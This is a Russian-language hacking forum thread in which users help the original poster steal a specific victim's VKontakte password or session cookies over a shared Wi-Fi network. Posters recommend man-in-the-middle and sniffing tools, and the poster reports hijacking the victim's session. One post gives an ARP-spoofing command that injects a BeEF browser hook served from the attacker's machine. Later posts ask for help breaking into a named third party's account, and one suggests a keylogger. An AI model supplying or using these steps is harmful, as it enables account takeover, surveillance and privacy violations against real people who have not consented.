PDA

Просмотр полной версии : Взлом ВК через локалку (WI-FI)


Ololeshka
19.08.2015, 19:45
Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.

hahanovB
19.08.2015, 21:55
Юзай http://comax.fr/yamas.php в Kali Linux

Ololeshka
19.08.2015, 22:33
↑ (https://antichat.live/posts/3882232/)
Юзай
http://comax.fr/yamas.php
в Kali Linux


не, жертва сидит на куках, а не входит/выходит, так что это не сработает

должны же быть более существенные методы, при имении полного доступа хотя бы к тому же роутеру, может можно подменить траффик или че то типа того.

hahanovB
19.08.2015, 22:36
↑ (https://antichat.live/posts/3882249/)
не, жертва сидит на куках, а не входит/выходит, так что это не сработает


http://comax.fr/yamas.php + Wireshark?

Ettercap + Wireshark?

VentaL74
20.08.2015, 02:10
Насколько я знаю, android мобила в связке с http://4pda.ru/forum/index.php?showtopic=243228 или http://4pda.ru/forum/index.php?showtopic=262107 должна справиться

Ololeshka
20.08.2015, 02:17
↑ (https://antichat.live/posts/3882250/)
http://comax.fr/yamas.php + (http://comax.fr/yamas.php)
Wireshark?




↑ (https://antichat.live/posts/3882301/)
Насколько я знаю, android мобила в связке с
http://4pda.ru/forum/index.php?showtopic=243228
или
http://4pda.ru/forum/index.php?showtopic=262107
должна справиться


Да, ,возможно но они достаточно лагучие ибо не обновлялись туеву хучу лет. В любом случае спасибо за ответы, завтра протестирую у себя и отпишусь.

DarkActions
22.08.2015, 15:42
Отпишись о результате, тоже интересно.

ghostar
22.08.2015, 15:57
Воу спасибо за программку, щас пойду ломать соседнюю тяночку

Ololeshka
22.08.2015, 17:30
Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.

Rac00n
22.08.2015, 17:39
↑ (https://antichat.live/posts/3883209/)
Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.


сюда подробности выложи, будет интересно почитать

Ololeshka
23.08.2015, 04:52
1 способ (под виндой) тут (https://www.youtube.com/watch?v=NR8dnCaus5I).

В лабораторных условиях все сработало на ура, в поле вышел фейл-жертва не вышла на связь.

2 способ (линукс) еще не полностью проверил, в принципе вот (https://www.youtube.com/watch?v=JNXOBN8kJrM) он.

Позже отпишу о конечном результате, если есть вопросы по теме-задавайте.

Ruslan1993it
23.08.2015, 22:21
dsploit + intercepter

Ololeshka
25.08.2015, 02:38
Напишу репорт о работе в поле.

Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3.

Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход".

Вывод: способ довольно малоэффективен. При наличии моих ресурсов можно придумать что-нибудь более эффективное, но т.к. я в этом вопросе относительно дилетант, то хз.

icyclopys
26.08.2015, 09:57
↑ (https://antichat.live/posts/3883988/)
Напишу репорт о работе в поле.
Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3.
Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход".
.


Дак, не хорошо у друзей тырить. Ладно бы у соседей, то пожалуйста.

Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец.

Ololeshka
26.08.2015, 13:07
↑ (https://antichat.live/posts/3884413/)
Дак, не хорошо у друзей тырить. Ладно бы у соседей, то пожалуйста.
Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец.


Цель была не стырить, а по практиковать полученные знания на будущее.

SVAROG
26.08.2015, 14:06
↑ (https://antichat.live/posts/3882177/)
Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.


вк через https работает, так что скорее всего ничего не получится.

icyclopys
26.08.2015, 17:04
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.


Вообще-то всё можно обойти. /threads/345266/ (https://antichat.live/threads/345266/)

Ololeshka
27.08.2015, 02:59
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.


а то, что все получилось и я уже об этом писал-это ничего, да? хттпс обходиться как два пальца (пост выше, + я видео гайд кидал). в моем случае все прошло гладко и без этого.

BabaDook
27.08.2015, 15:53
MITMF+cobalt+beef

смысл такой.

делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы

Ololeshka
27.08.2015, 16:52
↑ (https://antichat.live/posts/3884905/)
MITMF+cobalt+beef
смысл такой.
делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы


А можно подробнее? А то я о такой связке не слышал, да и шарю пока не ахти.

BabaDook
27.08.2015, 17:42
Всё в кали

запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js

apt-get install mitmf

mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js

про установку кобольта долго объяснять, но этого хватит. если что ЛС. но я бываю редко. Точнее не часто

Eder
07.09.2015, 07:28
А если Kali поставить на виртуалку, нужны ли какие нибудь надстройки над windows для полной работы kali?

MIVSML
08.09.2015, 10:58
спасибо всем за советы в теме, тоже актуальной оказалась проблема

YTPRORU
27.09.2015, 17:13
↑ (https://antichat.live/posts/3882301/)
Насколько я знаю, android мобила в связке с
http://4pda.ru/forum/index.php?showtopic=243228
или
http://4pda.ru/forum/index.php?showtopic=262107
должна справиться


Спасибо за информацию. Проги хоть и давно не обновлялись, но потестирую обязательно

avin
27.09.2015, 20:43
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.


вот как раз vk работает по умолчанию по http

Nastar
27.09.2015, 23:26
Intercepter-ng хватит с головой для такой задачи. Там есть функционал для "убийства" куков и перехвата логина с паролем при последующей авторизации.

Видосов по использованию на ютубе масса)

kozyref
30.09.2015, 00:01
↑ (https://antichat.live/posts/3882177/)
Нужно слить пароль/куки с компа жертвы.


Может помочь клавиатурный шпион

Veil
11.12.2015, 13:20
↑ (https://antichat.live/posts/3925969/)
кто нибуть может помочь?


Конечно же может помочь МВД,отдел "К" ну и господь Бог.И как вариант, подари своей женщине триппер,а она ему!Эдак запусти ему червя....Вот это будет по хакерски!))))

AppS
11.12.2015, 14:22
↑ (https://antichat.live/posts/3925969/)
нужен взлом ВК,буду благодарен,гнусный тип списывается с женатыми женщинами, назначает встречи,случай тяжёлый в плане взлома ,нет ни почты ,ни телефона,телефона не даёт ,связь только на сайте,скрывает даже на странице друзей друг от друга,кто нибуть может помочь?


найти другую жену)

funfun2016
28.03.2016, 08:54
Всем привет, нужно узнать логин пароль от вк, жертва сидит только на iOS с оф.приложения. Есть доступ к wifi и устройства на iOS и андроид.

World788
22.02.2017, 12:20
Всё в кали

запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js

apt-get install mitmf

mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js обьясни по подробней как и что?

Veil
23.02.2017, 03:33
Если в локалке ,то лучше чем интерцептор не найдешь снифера.